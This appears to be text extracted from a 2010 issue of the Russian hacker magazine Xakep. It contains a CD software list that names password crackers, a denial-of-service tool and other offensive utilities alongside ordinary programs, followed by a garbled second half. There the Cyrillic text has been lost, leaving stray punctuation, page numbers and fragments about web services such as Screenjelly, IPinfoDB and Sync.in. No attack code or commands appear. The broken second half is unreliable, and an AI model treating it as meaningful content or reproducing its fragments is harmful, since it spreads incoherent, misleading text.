Miranda 0.8.27
Nodepad++ 5.7
Opera 10.60
PuTTY 0.60
Skype 4.2
SysinternalsSuite ()
Total Commander 7.50a
Unlocker 1.8.9
Xakep CD DataSaver 6.0
XnView 1.97.6

>>WINDOWS
>Development
Adobe AIR 2.0
Diffuse 0.4.3
Eclipse 3.6
Enterprise Architect 8.0
Geany 0.19
Mockups For Desktop
Google App Engine SDK for Java
Google App Engine SDK for Python
HttpWatch 7.0
Inno Setup 5.3.10
jQueryPad
LINQPad
MySQL Community Server 5.1.48
MySQL Workbench 5.2.25
NetBeans 6.9
Python 2.7
WebStorm-RC-95.298

>>UNIX
>Desktop
DjVuSmooth 0.2.7
DockbarX 0.39.4
Enlightenment 1.0.2

>System
Acronis Drive Monitor Free
AVG Free Edition 9.0.839
BatteryCare 0.97
Beep Codes Viewer 0.0.1
Cobian Backup 10
DriveImage XML 2.14
FileSeek 1.9.8
HashMyFiles 1.68
HashTab 3.0
Ketarin 1.1
Monitor Asset Manager 2.5
RAMDisk 3.5
Sandboxie 3.46
Security Essentials 1.0.1963
SpyShelter Free
SSD Tweak Utility
UNetbootin 4.71
USB Safeguard 1.3
USB WriteProtector 1.1
VirtualBox 3.2.6
Watch 4 Folder 2.0

>Net
Adobe flash player 10.1
Aria2 1.9.5
CrossFTP 1.65a
EiskaltDC++ 2.0.3
Emesene 1.6.2
Empathy 2.30.2
Google Chrome 5.0.375.86
Googlecl 0.9.8
Googsystray 1.2.0
KDropbox 0.3.0
LimeWire 5.5.10
Mozilla Firefox 3.6.6
Mozilla Thunderbird 3.1
Opera 10.60
qBittorrent 2.2.10
SeaMonkey 2.0.5
Transmission 2.00
Twit Beta
Uget 1.5.9.2
XTelnet 0.4.4

>Games
Wormux 0.9.2

>Devel
Adobe AIR 2.0
Android 2.2
CodeBlocks 10.5
Eclipse 3.6
Geany 0.19
Gnat GPL 2010
Hancock 2.0.2
HSQLDB 2.0
libpng 1.4.3
Meld 1.3.2
MonoDevelop 2.4
MySQL Workbench 5.1.18
NetBeans 6.9
Python 2.7
Paco 2.0.8
Qt Creator 2.0
Ruby Enterprise Edition 1.8.7
Tcl 8.5.8
xTests 0.15.2
ZinjaI 20100624

>Security
AutoIt 3.3.6
BotHunter 1.5.0
EXEForger (SignsImitator) 1.0.40.10
Free Netsparker Community Edition
Hexjector 1.0.7.4
JBroFuzz 2.3
MDD 1.3
PenTBox 1.3.2
Poet 1.0.0
PyLoris 3.0
RainbowCrack 1.41
Sikuli 0.10.1
Snorby Spsa 1.4
Tinc 1.0.13
USBdumper
Wireshark 1.2.9

>Net
Fortitude HTTP 1.0.1.8
Garena
LogMeIn Hamachi
Opera 10.60
Swish 0.4.0
TightVNC 2.0
Trillian 4.2.0
Tunngle 4.3.1.4
VodBurner 1.0.2
Vuze 4.4.0.6a
Weezo 2.1

Flashcards 2.2.5
F-Spot 0.7.0
Furius ISO Mount 0.11.2.1
Gimp 2.6.9
Gnucash 2.2.9
Gramps 3.2.3
Inkscape 0.48
K3b 2.0.0
Kaffeine 1.0
LilyPond 2.13.2
Mathomatic 15.1.4
OpenOffice.org 3.2.1
Pcmanfm 0.9.7
Remind 3.1.9
SimpleBurn 1.5.1
SnowIsh 2
StarDict 3.0.2
VLC 1.1.0

iTunes 9.2
Lotus Symphony 3 Beta
Rainmeter 1.2
Songbird 1.7.3
Zoner Photo Studio Free

>System
EncFS 1.6.0
Linux Kernel 2.6.34
Logstalgia 1.0.0
Pacman 3.4.0
PCSX2 0.9.7 Beta
rdup 1.1.7
SynCE 0.15
Syslinux 3.86
Sysstat 9.1.3
Tracker 0.8.13
VirtualBox 3.2.6
Wine 1.0.1
WineGame 0.1
Zen-kernel 2.6.34

>Server
389 Directory Server 1.2.5
Amavisd-new 2.6.4
Anti-Spam SMTP Proxy Server
1.7.5.5
Apache 2.2.15
BIND 9.7.0
Cherokee 1.0.3
Courier-IMAP 4.8.0
CUPS 1.4.3
DHCP 4.1.1
Dovecot 1.1.12
Mail Avenger 0.8.1
Monkeyd 0.10.3
Music Player Daemon 0.15.9
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Samba 3.5.4
Simon 0.2
TeamSpeak3
Xorg server 1.8.1

>Security
Agentsmith 0.1
ArpON 2.0
AVG Anti-Virus Free Edition 8.5.0812
Beltane 1.0.17
Ctm 0.2.0
Editor shellcode
John the Ripper 1.7.6
Poet 1.0.0
PyLoris 3.0
Samhain 2.7.1
Simplefuzz 0.6.2
Snare 1.5.1
Snort2Pf 4.4
Spiderpig
Suricata 0.9.2
THC-Hydra 5.7
THC-IPv6 1.2
Tinc 1.0.13
Tmac 1.0
Tor 0.2.1.26

08(139) 2010


WARDIVING
-

MALWARE

08 (139) 2010



: 2
10
.

. 74

VIRUSTOTAL

. 30

NODE.JS

. 50

JAVASCRIPT

UNITS

HTTP:// WWW2


DDoS-

SCREENJELLY

IPINFODB

WWW2
ScreenToaster,
. , 31
. , , , , , Screenjelly. Windows Mac OS X
, .

, IPinfoDB IP-, . ,
, IP.
; ,
.htaccess,

. .

www.screenjelly.com

www.ipinfodb.com

ICONSEARCH

SYNC.IN

,
IconSearch. . , ,
, Google ,
. ,
519 .
133673 . : PNG- , , ,
.

, , - Etherpad, . ,

. Google, , ,
Google Docs Google Wave. ! ,
Etherpad Sync.in.
Create a public note (, sync.in/
mzTvpcoKKA) .

www.iconsearch.ru

144

www.sync.in

X 08 /139/ 10